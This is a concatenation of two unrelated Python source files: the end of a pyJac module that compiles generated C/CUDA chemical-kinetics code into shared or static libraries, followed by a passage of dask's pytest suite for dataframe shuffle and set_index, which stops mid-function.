libs = dict(c=['-lm', '-std=c99'],
cuda=['-lcudart'],
icc=['-m64', '-ipo', '-lm', '-std=c99']
)
def which(file):
"""A substitute for the `which` command, searches the PATH for
a given file"""
for path in os.environ["PATH"].split(os.pathsep):
if os.path.exists(os.path.join(path, file)):
return os.path.join(path, file)
return None
def compiler(fstruct):
"""Given a file structure, this method will compile the source file for the
language and options specified
Parameters
----------
fstruct : `file_struct`
An information struct that holds the various compilation options
Returns
-------
success : int
0 if the compilation process was sucessful, -1 otherwise
Notes
-----
Designed to work with a multiprocess compilation workflow
"""
args = [cmd_compile[fstruct.build_lang]]
if fstruct.auto_diff:
args = ['g++']
args.extend(flags[fstruct.build_lang])
if fstruct.auto_diff:
args = [x for x in args if 'std=c99' not in x]
#always use fPIC in case we're building wrapper
args.extend(shared_flags[fstruct.build_lang])
args.extend(fstruct.args)
include = ['-I{}'.format(d) for d in fstruct.i_dirs +
includes[fstruct.build_lang]
]
args.extend(include)
args.extend([
'-{}c'.format('d' if fstruct.lang == 'cuda' else ''),
os.path.join(fstruct.source_dir, fstruct.filename +
utils.file_ext[fstruct.build_lang]
),
'-o', os.path.join(fstruct.obj_dir, os.path.basename(fstruct.filename) + '.o')
])
args = [val for val in args if val.strip()]
try:
print(' '.join(args))
subprocess.check_call(args)
except OSError:
print('Error: Compiler {} not found, generation of pyjac library failed.'.format(args[0]))
sys.exit(-1)
except subprocess.CalledProcessError:
print('Error: compilation failed for ' + fstruct.filename +
utils.file_ext[fstruct.build_lang]
)
return -1
return 0
def get_cuda_path():
"""Returns location of CUDA (nvcc) on the system.
Parameters
----------
None
Returns
-------
cuda_path : str
Path where CUDA (nvcc) is found on the system.
"""
cuda_path = which('nvcc')
if cuda_path is None:
print('nvcc not found!')
sys.exit(-1)
sixtyfourbit = platform.architecture()[0] == '64bit'
cuda_path = os.path.dirname(os.path.dirname(cuda_path))
cuda_path = os.path.join(cuda_path,
'lib{}'.format('64' if sixtyfourbit else '')
)
return cuda_path
def libgen(lang, obj_dir, out_dir, filelist, shared, auto_diff):
"""Create a library from a list of compiled files
Parameters
----------
Parameters
----------
obj_dir : str
Path with object files
out_dir : str
Path to place the library in
lang : {'c', 'cuda'}
Programming language
filelist : List of `str`
The list of object files to include in the library
auto_diff : Optional[bool]
Optional; if ``True``, include autodifferentiation
"""
command = cmd_lib(lang, shared)
if lang == 'cuda':
desc = 'cu'
elif lang == 'c':
if auto_diff:
desc = 'ad'
else:
desc = 'c'
libname = 'lib{}_pyjac'.format(desc)
#remove the old library
if os.path.exists(os.path.join(out_dir, libname + lib_ext(shared))):
os.remove(os.path.join(out_dir, libname + lib_ext(shared)))
if os.path.exists(os.path.join(out_dir, libname + lib_ext(not shared))):
os.remove(os.path.join(out_dir, libname + lib_ext(not shared)))
libname += lib_ext(shared)
if not shared and lang == 'c':
command += [os.path.join(out_dir, libname)]
#add the files
command.extend([os.path.join(obj_dir, os.path.basename(f) + '.o') for f in filelist])
if shared:
command.extend(shared_flags[lang])
if shared or lang == 'cuda':
command += ['-o']
command += [os.path.join(out_dir, libname)]
if lang == 'cuda':
command += ['-L{}'.format(get_cuda_path())]
command.extend(libs[lang])
try:
print(' '.join(command))
subprocess.check_call(command)
except OSError:
print('Error: Compiler {} not found, generation of pyjac library failed.'.format(args[0]))
sys.exit(-1)
except subprocess.CalledProcessError:
print('Error: Generation of pyjac library failed.')
sys.exit(-1)
return libname
class file_struct(object):
"""A simple structure designed to enable multiprocess compilation
"""
def __init__(self, lang, build_lang, filename, i_dirs, args,
source_dir, obj_dir, shared
):
"""
Parameters
----------
lang : str
Compiler to use
build_lang : {'c', 'cuda'}
Programming language
file_name : str
The file to compile
i_dirs : List of str
List of include directorys for compilation
args : List of str
List of additional arguements
source_dir : str
The directory the file is located in
obj_dir : str
The directory to place the compiled object file in
shared : bool
If true, this is creating a shared library
"""
self.lang = lang
self.build_lang = build_lang
self.filename = filename
self.i_dirs = i_dirs
self.args = args
self.source_dir = source_dir
self.obj_dir = obj_dir
self.shared = shared
self.auto_diff=False
def get_file_list(source_dir, pmod, lang, FD=False, AD=False):
"""
Parameters
----------
source_dir : str
Path with source files
pmod : bool
``True`` if pressure dependent reactions present in mechanism
lang : {'c', 'cuda'}
Programming language
FD : Optional[bool]
Optional; if ``True``, include finite difference
AD : Optional[bool]
Optional; if ``True``, include autodifferentiation
Returns
-------
i_dirs : list of `str`
List of include directories
files : list of `str`
List of files
"""
i_dirs = [source_dir]
if AD:
files = ['ad_dydt', 'ad_rxn_rates', 'ad_spec_rates',
'ad_chem_utils', 'ad_jac'
]
if pmod:
files += ['ad_rxn_rates_pres_mod']
return i_dirs, files
files = ['chem_utils', 'dydt', 'spec_rates',
'rxn_rates', 'mechanism', 'mass_mole'
]
if pmod:
files += ['rxn_rates_pres_mod']
if FD:
files += ['fd_jacob']
flists = []
else:
files += ['jacob']
flists = [('jacobs', 'jac_list_{}')]
flists += [('rates', 'rate_list_{}')]
for flist in flists:
try:
with open(os.path.join(source_dir,
flist[0], flist[1].format(lang))
) as file:
vals = file.readline().strip().split(' ')
vals = [os.path.join(flist[0],
f[:f.index(utils.file_ext[lang])]) for f in vals
]
files += vals
i_dirs.append(os.path.join(source_dir, flist[0]))
except:
pass
if lang == 'cuda':
files += ['gpu_memory']
return i_dirs, files
def generate_library(lang, source_dir, obj_dir=None,
out_dir=None, shared=None,
finite_difference=False, auto_diff=False
):
"""Generate shared/static library for pyJac files.
Parameters
----------
lang : {'c', 'cuda'}
Programming language
source_dir : str
Path of folder with pyJac files
obj_dir : Optional[str]
Optional; path of folder to store generated object files
shared : bool
If ``True``, generate shared library (vs. static)
finite_difference : Optional[bool]
If ``True``, include finite differences
auto_diff : bool
If ``True``, include autodifferentiation
Returns
-------
Location of generated library
"""
#check lang
if lang not in flags.keys():
print('Cannot generate library for unknown language {}'.format(lang))
sys.exit(-1)
shared = shared and lang != 'cuda'
if lang == 'cuda' and shared:
print('CUDA does not support linking of shared device libraries.')
sys.exit(-1)
build_lang = lang if lang != 'icc' else 'c'
source_dir = os.path.abspath(os.path.normpath(source_dir))
if obj_dir is None:
obj_dir = os.path.join(os.getcwd(), 'obj')
else:
obj_dir = os.path.abspath(os.path.normpath(obj_dir))
if not os.path.exists(obj_dir):
os.makedirs(obj_dir)
if out_dir is None:
out_dir = os.getcwd()
else:
out_dir = os.path.abspath(os.path.normpath(out_dir))
if not os.path.exists(out_dir):
os.makedirs(out_dir)
obj_dir = os.path.abspath(obj_dir)
out_dir = os.path.abspath(out_dir)
pmod = False
#figure out whether there's pressure mod reactions or not
with open(os.path.join(source_dir,
'mechanism{}'.format(utils.header_ext[build_lang])), 'r'
) as file:
for line in file.readlines():
line = line.strip()
match = re.search(r'\s*#define PRES_MOD_RATES (\d+)', line)
if match is not None:
pmod = int(match.group(1)) > 0
break
#get file lists
i_dirs, files = get_file_list(source_dir, pmod, build_lang,
FD=finite_difference, AD=auto_diff
)
# Compile generated source code
structs = [file_struct(lang, build_lang, f, i_dirs,
(['-DFINITE_DIFF'] if finite_difference else []),
source_dir, obj_dir, shared) for f in files
]
for x in structs:
x.auto_diff=auto_diff
pool = multiprocessing.Pool()
results = pool.map(compiler, structs)
pool.close()
pool.join()
if any(r == -1 for r in results):
sys.exit(-1)
libname = libgen(lang, obj_dir, out_dir, files, shared, auto_diff)
return os.path.join(out_dir, libname)
|
|
import itertools
import os
import random
import tempfile
from unittest import mock
import pandas as pd
import pytest
import pickle
import numpy as np
import string
import multiprocessing as mp
from copy import copy
import dask
import dask.dataframe as dd
from dask.dataframe._compat import tm, assert_categorical_equal
from dask import delayed
from dask.base import compute_as_if_collection
from dask.dataframe.shuffle import (
shuffle,
partitioning_index,
rearrange_by_column,
rearrange_by_divisions,
maybe_buffered_partd,
remove_nans,
)
from dask.dataframe.utils import assert_eq, make_meta
dsk = {
("x", 0): pd.DataFrame({"a": [1, 2, 3], "b": [1, 4, 7]}, index=[0, 1, 3]),
("x", 1): pd.DataFrame({"a": [4, 5, 6], "b": [2, 5, 8]}, index=[5, 6, 8]),
("x", 2): pd.DataFrame({"a": [7, 8, 9], "b": [3, 6, 9]}, index=[9, 9, 9]),
}
meta = make_meta({"a": "i8", "b": "i8"}, index=pd.Index([], "i8"))
d = dd.DataFrame(dsk, "x", meta, [0, 4, 9, 9])
full = d.compute()
shuffle_func = shuffle # conflicts with keyword argument
@pytest.mark.parametrize("shuffle", ["disk", "tasks"])
def test_shuffle(shuffle):
s = shuffle_func(d, d.b, shuffle=shuffle)
assert isinstance(s, dd.DataFrame)
assert s.npartitions == d.npartitions
x = dask.get(s.dask, (s._name, 0))
y = dask.get(s.dask, (s._name, 1))
assert not (set(x.b) & set(y.b)) # disjoint
assert set(s.dask).issuperset(d.dask)
assert shuffle_func(d, d.b)._name == shuffle_func(d, d.b)._name
def test_default_partitions():
assert shuffle(d, d.b).npartitions == d.npartitions
def test_shuffle_npartitions_task():
df = pd.DataFrame({"x": np.random.random(100)})
ddf = dd.from_pandas(df, npartitions=10)
s = shuffle(ddf, ddf.x, shuffle="tasks", npartitions=17, max_branch=4)
sc = s.compute(scheduler="sync")
assert s.npartitions == 17
assert set(s.dask).issuperset(set(ddf.dask))
assert len(sc) == len(df)
assert list(s.columns) == list(df.columns)
assert set(map(tuple, sc.values.tolist())) == set(map(tuple, df.values.tolist()))
@pytest.mark.parametrize("method", ["disk", "tasks"])
def test_index_with_non_series(method):
from dask.dataframe.tests.test_multi import list_eq
list_eq(shuffle(d, d.b, shuffle=method), shuffle(d, "b", shuffle=method))
@pytest.mark.parametrize("method", ["disk", "tasks"])
def test_index_with_dataframe(method):
res1 = shuffle(d, d[["b"]], shuffle=method).compute()
res2 = shuffle(d, ["b"], shuffle=method).compute()
res3 = shuffle(d, "b", shuffle=method).compute()
assert sorted(res1.values.tolist()) == sorted(res2.values.tolist())
assert sorted(res1.values.tolist()) == sorted(res3.values.tolist())
@pytest.mark.parametrize("method", ["disk", "tasks"])
def test_shuffle_from_one_partition_to_one_other(method):
df = pd.DataFrame({"x": [1, 2, 3]})
a = dd.from_pandas(df, 1)
for i in [1, 2]:
b = shuffle(a, "x", npartitions=i, shuffle=method)
assert len(a.compute(scheduler="sync")) == len(b.compute(scheduler="sync"))
@pytest.mark.parametrize("method", ["disk", "tasks"])
def test_shuffle_empty_partitions(method):
df = pd.DataFrame({"x": [1, 2, 3] * 10})
ddf = dd.from_pandas(df, npartitions=3)
s = shuffle(ddf, ddf.x, npartitions=6, shuffle=method)
parts = compute_as_if_collection(dd.DataFrame, s.dask, s.__dask_keys__())
for p in parts:
assert s.columns == p.columns
df2 = pd.DataFrame(
{
"i32": np.array([1, 2, 3] * 3, dtype="int32"),
"f32": np.array([None, 2.5, 3.5] * 3, dtype="float32"),
"cat": pd.Series(["a", "b", "c"] * 3).astype("category"),
"obj": pd.Series(["d", "e", "f"] * 3),
"bool": np.array([True, False, True] * 3),
"dt": pd.Series(pd.date_range("20130101", periods=9)),
"dt_tz": pd.Series(pd.date_range("20130101", periods=9, tz="US/Eastern")),
"td": pd.Series(pd.timedelta_range("2000", periods=9)),
}
)
def test_partitioning_index():
res = partitioning_index(df2.i32, 3)
assert ((res < 3) & (res >= 0)).all()
assert len(np.unique(res)) > 1
assert (partitioning_index(df2.i32, 3) == partitioning_index(df2.i32, 3)).all()
res = partitioning_index(df2[["i32"]], 3)
assert ((res < 3) & (res >= 0)).all()
assert len(np.unique(res)) > 1
res = partitioning_index(df2[["cat", "bool", "f32"]], 2)
assert ((0 <= res) & (res < 2)).all()
res = partitioning_index(df2.index, 4)
assert ((res < 4) & (res >= 0)).all()
assert len(np.unique(res)) > 1
def test_partitioning_index_categorical_on_values():
df = pd.DataFrame({"a": list(string.ascii_letters), "b": [1, 2, 3, 4] * 13})
df.a = df.a.astype("category")
df2 = df.copy()
df2.a = df2.a.cat.set_categories(list(reversed(df2.a.cat.categories)))
res = partitioning_index(df.a, 5)
res2 = partitioning_index(df2.a, 5)
assert (res == res2).all()
res = partitioning_index(df, 5)
res2 = partitioning_index(df2, 5)
assert (res == res2).all()
@pytest.mark.parametrize(
"npartitions", [1, 4, 7, pytest.param(23, marks=pytest.mark.slow)]
)
def test_set_index_tasks(npartitions):
df = pd.DataFrame(
{"x": np.random.random(100), "y": np.random.random(100) // 0.2},
index=np.random.random(100),
)
ddf = dd.from_pandas(df, npartitions=npartitions)
assert_eq(df.set_index("x"), ddf.set_index("x", shuffle="tasks"))
assert_eq(df.set_index("y"), ddf.set_index("y", shuffle="tasks"))
assert_eq(df.set_index(df.x), ddf.set_index(ddf.x, shuffle="tasks"))
assert_eq(df.set_index(df.x + df.y), ddf.set_index(ddf.x + ddf.y, shuffle="tasks"))
assert_eq(df.set_index(df.x + 1), ddf.set_index(ddf.x + 1, shuffle="tasks"))
assert_eq(df.set_index(df.index), ddf.set_index(ddf.index, shuffle="tasks"))
@pytest.mark.parametrize("shuffle", ["disk", "tasks"])
def test_set_index_self_index(shuffle):
df = pd.DataFrame(
{"x": np.random.random(100), "y": np.random.random(100) // 0.2},
index=np.random.random(100),
)
a = dd.from_pandas(df, npartitions=4)
b = a.set_index(a.index, shuffle=shuffle)
assert a is b
assert_eq(b, df.set_index(df.index))
@pytest.mark.parametrize("shuffle", ["tasks"])
def test_set_index_names(shuffle):
df = pd.DataFrame(
{"x": np.random.random(100), "y": np.random.random(100) // 0.2},
index=np.random.random(100),
)
ddf = dd.from_pandas(df, npartitions=4)
assert set(ddf.set_index("x", shuffle=shuffle).dask) == set(
ddf.set_index("x", shuffle=shuffle).dask
)
assert set(ddf.set_index("x", shuffle=shuffle).dask) != set(
ddf.set_index("y", shuffle=shuffle).dask
)
assert set(ddf.set_index("x", max_branch=4, shuffle=shuffle).dask) != set(
ddf.set_index("x", max_branch=3, shuffle=shuffle).dask
)
assert set(ddf.set_index("x", drop=True, shuffle=shuffle).dask) != set(
ddf.set_index("x", drop=False, shuffle=shuffle).dask
)
@pytest.mark.parametrize("shuffle", ["disk", "tasks"])
def test_set_index_tasks_2(shuffle):
df = dd.demo.make_timeseries(
"2000",
"2004",
{"value": float, "name": str, "id": int},
freq="2H",
partition_freq="1M",
seed=1,
)
df2 = df.set_index("name", shuffle=shuffle)
df2.value.sum().compute(scheduler="sync")
@pytest.mark.parametrize("shuffle", ["disk", "tasks"])
def test_set_index_tasks_3(shuffle):
df = pd.DataFrame(np.random.random((10, 2)), columns=["x", "y"])
ddf = dd.from_pandas(df, npartitions=5)
ddf2 = ddf.set_index(
"x", shuffle=shuffle, max_branch=2, npartitions=ddf.npartitions
)
df2 = df.set_index("x")
assert_eq(df2, ddf2)
assert ddf2.npartitions == ddf.npartitions
@pytest.mark.parametrize("shuffle", ["tasks", "disk"])
def test_shuffle_sort(shuffle):
df = pd.DataFrame({"x": [1, 2, 3, 2, 1], "y": [9, 8, 7, 1, 5]})
ddf = dd.from_pandas(df, npartitions=3)
df2 = df.set_index("x").sort_index()
ddf2 = ddf.set_index("x", shuffle=shuffle)
assert_eq(ddf2.loc[2:3], df2.loc[2:3])
@pytest.mark.parametrize("shuffle", ["tasks", "disk"])
@pytest.mark.parametrize("scheduler", ["threads", "processes"])
def test_rearrange(shuffle, scheduler):
df = pd.DataFrame({"x": np.random.random(10)})
ddf = dd.from_pandas(df, npartitions=4)
ddf2 = ddf.assign(_partitions=ddf.x % 4)
result = rearrange_by_column(ddf2, "_partitions", max_branch=32, shuffle=shuffle)
assert result.npartitions == ddf.npartitions
assert set(ddf.dask).issubset(result.dask)
# Every value in exactly one partition
a = result.compute(scheduler=scheduler)
get = dask.base.get_scheduler(scheduler=scheduler)
parts = get(result.dask, result.__dask_keys__())
for i in a._partitions.drop_duplicates():
assert sum(i in set(part._partitions) for part in parts) == 1
def test_rearrange_cleanup():
df = pd.DataFrame({"x": np.random.random(10)})
ddf = dd.from_pandas(df, npartitions=4)
ddf2 = ddf.assign(_partitions=ddf.x % 4)
tmpdir = tempfile.mkdtemp()
with dask.config.set(temporay_directory=str(tmpdir)):
result = rearrange_by_column(ddf2, "_partitions", max_branch=32, shuffle="disk")
result.compute(scheduler="processes")
assert len(os.listdir(tmpdir)) == 0
def mock_shuffle_group_3(df, col, npartitions, p):
raise ValueError("Mock exception!")
def test_rearrange_disk_cleanup_with_exception():
# ensure temporary files are cleaned up when there's an internal exception.
with mock.patch("dask.dataframe.shuffle.shuffle_group_3", new=mock_shuffle_group_3):
df = pd.DataFrame({"x": np.random.random(10)})
ddf = dd.from_pandas(df, npartitions=4)
ddf2 = ddf.assign(_partitions=ddf.x % 4)
tmpdir = tempfile.mkdtemp()
with dask.config.set(temporay_directory=str(tmpdir)):
with pytest.raises(ValueError, match="Mock exception!"):
result = rearrange_by_column(
ddf2, "_partitions", max_branch=32, shuffle="disk"
)
result.compute(scheduler="processes")
assert len(os.listdir(tmpdir)) == 0
def test_rearrange_by_column_with_narrow_divisions():
from dask.dataframe.tests.test_multi import list_eq
A = pd.DataFrame({"x": [1, 2, 3, 4, 5, 6], "y": [1, 1, 2, 2, 3, 4]})
a = dd.repartition(A, [0, 4, 5])
df = rearrange_by_divisions(a, "x", (0, 2, 5))
list_eq(df, a)
def test_maybe_buffered_partd():
import partd
f = maybe_buffered_partd()
p1 = f()
assert isinstance(p1.partd, partd.Buffer)
f2 = pickle.loads(pickle.dumps(f))
assert not f2.buffer
p2 = f2()
assert isinstance(p2.partd, partd.File)
def test_set_index_with_explicit_divisions():
df = pd.DataFrame({"x": [4, 1, 2, 5]}, index=[10, 20, 30, 40])
ddf = dd.from_pandas(df, npartitions=2)
def throw(*args, **kwargs):
raise Exception()
with dask.config.set(get=throw):
ddf2 = ddf.set_index("x", divisions=[1, 3, 5])
assert ddf2.divisions == (1, 3, 5)
df2 = df.set_index("x")
assert_eq(ddf2, df2)
# Divisions must be sorted
with pytest.raises(ValueError):
ddf.set_index("x", divisions=[3, 1, 5])
def test_set_index_divisions_2():
df = pd.DataFrame({"x": [1, 2, 3, 4, 5, 6], "y": list("abdabd")})
ddf = dd.from_pandas(df, 2)
result = ddf.set_index("y", divisions=["a", "c", "d"])
assert result.divisions == ("a", "c", "d")
assert list(result.compute(scheduler="sync").index[-2:]) == ["d", "d"]
def test_set_index_divisions_compute():
d2 = d.set_index("b", divisions=[0, 2, 9], compute=False)
d3 = d.set_index("b", divisions=[0, 2, 9], compute=True)
assert_eq(d2, d3)
assert_eq(d2, full.set_index("b"))
assert_eq(d3, full.set_index("b"))
assert len(d2.dask) > len(d3.dask)
d4 = d.set_index(d.b, divisions=[0, 2, 9], compute=False)
d5 = d.set_index(d.b, divisions=[0, 2, 9], compute=True)
exp = full.copy()
exp.index = exp.b
assert_eq(d4, d5)
assert_eq(d4, exp)
assert_eq(d5, exp)
assert len(d4.dask) > len(d5.dask)
def test_set_index_divisions_sorted():
p1 = pd.DataFrame({"x": [10, 11, 12], "y": ["a", "a", "a"]})
p2 = pd.DataFrame({"x": [13, 14, 15], "y": ["b", "b", "c"]})
p3 = pd.DataFrame({"x": [16, 17, 18], "y": ["d", "e", "e"]})
ddf = dd.DataFrame(
{("x", 0): p1, ("x", 1): p2, ("x", 2): p3}, "x", p1, [None, None, None, None]
)
df = ddf.compute()
def throw(*args, **kwargs):
raise Exception("Shouldn't have computed")
with dask.config.set(get=throw):
res = ddf.set_index("x", divisions=[10, 13, 16, 18], sorted=True)
assert_eq(res, df.set_index("x"))
with dask.config.set(get=throw):
res = ddf.set_index("y", divisions=["a", "b", "d", "e"], sorted=True)
assert_eq(res, df.set_index("y"))
# with sorted=True, divisions must be same length as df.divisions
with pytest.raises(ValueError):
ddf.set_index("y", divisions=["a", "b", "c", "d", "e"], sorted=True)
# Divisions must be sorted
with pytest.raises(ValueError):
ddf.set_index("y", divisions=["a", "b", "d", "c"], sorted=True)
@pytest.mark.slow
def test_set_index_consistent_divisions():
# See https://github.com/dask/dask/issues/3867
df = pd.DataFrame(
{"x": np.random.random(100), "y": np.random.random(100) // 0.2},
index=np.random.random(100),
)
ddf = dd.from_pandas(df, npartitions=4)
ddf = ddf.clear_divisions()
ctx = mp.get_context("spawn")
pool = ctx.Pool(processes=8)
with pool:
results = [pool.apply_async(_set_index, (ddf, "x")) for _ in range(100)]
divisions_set = set(result.get() for result in results)
assert len(divisions_set) == 1
def _set_index(df, *args, **kwargs):
return df.set_index(*args, **kwargs).divisions
@pytest.mark.parametrize("shuffle", ["disk", "tasks"])
def test_set_index_reduces_partitions_small(shuffle):
df = pd.DataFrame({"x": np.random.random(100)})
ddf = dd.from_pandas(df, npartitions=50)
ddf2 = ddf.set_index("x", shuffle=shuffle, npartitions="auto")
assert ddf2.npartitions < 10
def make_part(n):
return pd.DataFrame({"x": np.random.random(n), "y": np.random.random(n)})
@pytest.mark.parametrize("shuffle", ["disk", "tasks"])
def test_set_index_reduces_partitions_large(shuffle):
nbytes = 1e6
nparts = 50
n = int(nbytes / (nparts * 8))
ddf = dd.DataFrame(
{("x", i): (make_part, n) for i in range(nparts)},
"x",
make_part(1),
[None] * (nparts + 1),
)
ddf2 = ddf.set_index(
"x", shuffle=shuffle, npartitions="auto", partition_size=nbytes
)
assert 1 < ddf2.npartitions < 20
@pytest.mark.parametrize("shuffle", ["disk", "tasks"])
def test_set_index_doesnt_increase_partitions(shuffle):
nparts = 2
nbytes = 1e6
n = int(nbytes / (nparts * 8))
ddf = dd.DataFrame(
{("x", i): (make_part, n) for i in range(nparts)},
"x",
make_part(1),
[None] * (nparts + 1),
)
ddf2 = ddf.set_index(
"x", shuffle=shuffle, npartitions="auto", partition_size=nbytes
)
assert ddf2.npartitions <= ddf.npartitions
@pytest.mark.parametrize("shuffle", ["disk", "tasks"])
def test_set_index_detects_sorted_data(shuffle):
df = pd.DataFrame({"x": range(100), "y": range(100)})
ddf = dd.from_pandas(df, npartitions=10, name="x", sort=False)
ddf2 = ddf.set_index("x", shuffle=shuffle)
assert len(ddf2.dask) < ddf.npartitions * 4
def test_set_index_sorts():
# https://github.com/dask/dask/issues/2288
vals = np.array(
[
1348550149000000000,
1348550149000000000,
1348558142000000000,
1348558142000000000,
1348585928000000000,
1348585928000000000,
1348600739000000000,
1348601706000000000,
1348600739000000000,
1348601706000000000,
1348614789000000000,
1348614789000000000,
1348621037000000000,
1348621038000000000,
1348621040000000000,
1348621037000000000,
1348621038000000000,
1348621040000000000,
1348637628000000000,
1348638159000000000,
1348638160000000000,
1348638159000000000,
1348638160000000000,
1348637628000000000,
1348646354000000000,
1348646354000000000,
1348659107000000000,
1348657111000000000,
1348659107000000000,
1348657111000000000,
1348672876000000000,
1348672876000000000,
1348682787000000000,
1348681985000000000,
1348682787000000000,
1348681985000000000,
1348728167000000000,
1348728167000000000,
1348730745000000000,
1348730745000000000,
1348750198000000000,
1348750198000000000,
1348750198000000000,
1348753539000000000,
1348753539000000000,
1348753539000000000,
1348754449000000000,
1348754449000000000,
1348761333000000000,
1348761554000000000,
1348761610000000000,
1348761333000000000,
1348761554000000000,
1348761610000000000,
1348782624000000000,
1348782624000000000,
1348782624000000000,
1348782624000000000,
]
)
vals = pd.to_datetime(vals, unit="ns")
breaks = [10, 36, 58]
dfs = []
for i in range(len(breaks)):
lo = sum(breaks[:i])
hi = sum(breaks[i : i + 1])
dfs.append(pd.DataFrame({"timestamp": vals[lo:hi]}, index=range(lo, hi)))
ddf = dd.concat(dfs).clear_divisions()
assert ddf.set_index("timestamp").index.compute().is_monotonic is True
def test_set_index():
dsk = {
("x", 0): pd.DataFrame({"a": [1, 2, 3], "b": [4, 2, 6]}, index=[0, 1, 3]),
("x", 1): pd.DataFrame({"a": [4, 5, 6], "b": [3, 5, 8]}, index=[5, 6, 8]),
("x", 2): pd.DataFrame({"a": [7, 8, 9], "b": [9, 1, 8]}, index=[9, 9, 9]),
}
d = dd.DataFrame(dsk, "x", meta, [0, 4, 9, 9])
full = d.compute()
d2 = d.set_index("b", npartitions=3)
assert d2.npartitions == 3
assert d2.index.name == "b"
assert_eq(d2, full.set_index("b"))
d3 = d.set_index(d.b, npartitions=3)
assert d3.npartitions == 3
assert d3.index.name == "b"
assert_eq(d3, full.set_index(full.b))
d4 = d.set_index("b")
assert d4.index.name == "b"
assert_eq(d4, full.set_index("b"))
d5 = d.set_index(["b"])
assert d5.index.name == "b"
assert_eq(d5, full.set_index(["b"]))
def test_set_index_interpolate():
df = pd.DataFrame({"x": [4, 1, 1, 3, 3], "y": [1.0, 1, 1, 1, 2]})
d = dd.from_pandas(df, 2)
d1 = d.set_index("x", npartitions=3)
assert d1.npartitions == 3
assert set(d1.divisions) == set([1, 2, 3, 4])
d2 = d.set_index("y", npartitions=3)
assert d2.divisions[0] == 1.0
assert 1.0 < d2.divisions[1] < d2.divisions[2] < 2.0
assert d2.divisions[3] == 2.0
def test_set_index_interpolate_int():
L = sorted(list(range(0, 200, 10)) * 2)
df = pd.DataFrame({"x": 2 * L})
d = dd.from_pandas(df, 2)
d1 = d.set_index("x", npartitions=10)
assert all(np.issubdtype(type(x), np.integer) for x in d1.divisions)
def test_set_index_timezone():
s_naive = pd.Series(pd.date_range("20130101", periods=3))
s_aware = pd.Series(pd.date_range("20130101", periods=3, tz="US/Eastern"))
df = pd.DataFrame({"tz": s_aware, "notz": s_naive})
d = dd.from_pandas(df, 2)
d1 = d.set_index("notz", npartitions=2)
s1 = pd.DatetimeIndex(s_naive.values, dtype=s_naive.dtype)
assert d1.divisions[0] == s_naive[0] == s1[0]
assert d1.divisions[-1] == s_naive[2] == s1[2]
# We currently lose "freq". Converting data with pandas-defined dtypes
# to numpy or pure Python can be lossy like this.
d2 = d.set_index("tz", npartitions=2)
s2 = pd.DatetimeIndex(s_aware, dtype=s_aware.dtype)
assert d2.divisions[0] == s2[0]
assert d2.divisions[-1] == s2[2]
assert d2.divisions[0].tz == s2[0].tz
assert d2.divisions[0].tz is not None
s2badtype = pd.DatetimeIndex(s_aware.values, dtype=s_naive.dtype)
with pytest.raises(TypeError):
d2.divisions[0] == s2badtype[0]
@pytest.mark.parametrize("drop", [True, False])
def test_set_index_drop(drop):
pdf = pd.DataFrame(
{
"A": list("ABAABBABAA"),
"B": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],
"C": [1, 2, 3, 2, 1, 3, 2, 4, 2, 3],
}
)
ddf = dd.from_pandas(pdf, 3)
assert_eq(ddf.set_index("A", drop=drop), pdf.set_index("A", drop=drop))
assert_eq(ddf.set_index("B", drop=drop), pdf.set_index("B", drop=drop))
assert_eq(ddf.set_index("C", drop=drop), pdf.set_index("C", drop=drop))
assert_eq(ddf.set_index(ddf.A, drop=drop), pdf.set_index(pdf.A, drop=drop))
assert_eq(ddf.set_index(ddf.B, drop=drop), pdf.set_index(pdf.B, drop=drop))
assert_eq(ddf.set_index(ddf.C, drop=drop), pdf.set_index(pdf.C, drop=drop))
# numeric columns
pdf = pd.DataFrame(
{
0: list("ABAABBABAA"),
1: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],
2: [1, 2, 3, 2, 1, 3, 2, 4, 2, 3],
}
)
ddf = dd.from_pandas(pdf, 3)
assert_eq(ddf.set_index(0, drop=drop), pdf.set_index(0, drop=drop))
assert_eq(ddf.set_index(2, drop=drop), pdf.set_index(2, drop=drop))
def test_set_index_raises_error_on_bad_input():
df = pd.DataFrame({"a": [1, 2, 3, 4, 5, 6, 7], "b": [7, 6, 5, 4, 3, 2, 1]})
ddf = dd.from_pandas(df, 2)
msg = r"Dask dataframe does not yet support multi-indexes"
with pytest.raises(NotImplementedError) as err:
ddf.set_index(["a", "b"])
assert msg in str(err.value)
with pytest.raises(NotImplementedError) as err:
ddf.set_index([["a", "b"]])
assert msg in str(err.value)
with pytest.raises(NotImplementedError) as err:
ddf.set_index([["a"]])
assert msg in str(err.value)
def test_set_index_sorted_true():
df = pd.DataFrame({"x": [1, 2, 3, 4], "y": [10, 20, 20, 40], "z": [4, 3, 2, 1]})
a = dd.from_pandas(df, 2, sort=False)
assert not a.known_divisions
b = a.set_index("x", sorted=True)
assert b.known_divisions
assert set(a.dask).issubset(set(b.dask))
for drop in [True, False]:
assert_eq(a.set_index("x", drop=drop), df.set_index("x", drop=drop))
assert_eq(
a.set_index(a.x, sorted=True, drop=drop), df.set_index(df.x, drop=drop)
)
assert_eq(
a.set_index(a.x + 1, sorted=True, drop=drop),
df.set_index(df.x + 1, drop=drop),
)
with pytest.raises(ValueError):
a.set_index(a.z, sorted=True)
def test_set_index_sorted_single_partition():
df = pd.DataFrame({"x": [1, 2, 3, 4], "y": [1, 0, 1, 0]})
ddf = dd.from_pandas(df, npartitions=1)
assert_eq(ddf.set_index("x", sorted=True), df.set_index("x"))
def test_set_index_sorted_min_max_same():
a = pd.DataFrame({"x": [1, 2, 3], "y": [0, 0, 0]})
b = pd.DataFrame({"x": [1, 2, 3], "y": [1, 1, 1]})
aa = delayed(a)
bb = delayed(b)
df = dd.from_delayed([aa, bb], meta=a)
assert not df.known_divisions
df2 = df.set_index("y", sorted=True)
assert df2.divisions == (0, 1, 1)
def test_set_index_empty_partition():
test_vals = [1, 2, 3]
converters = [int, float, str, lambda x: pd.to_datetime(x, unit="ns")]
for conv in converters:
df = pd.DataFrame(
[{"x": conv(i), "y": i} for i in test_vals], columns=["x", "y"]
)
ddf = dd.concat(
[
dd.from_pandas(df, npartitions=1),
dd.from_pandas(df[df.y > df.y.max()], npartitions=1),
]
)
assert any(ddf.get_partition(p).compute().empty for p in range(ddf.npartitions))
assert assert_eq(ddf.set_index("x"), df.set_index("x"))
def test_set_index_on_empty():
test_vals = [1, 2, 3, 4]
converters = [int, float, str, lambda x: pd.to_datetime(x, unit="ns")]
for converter in converters:
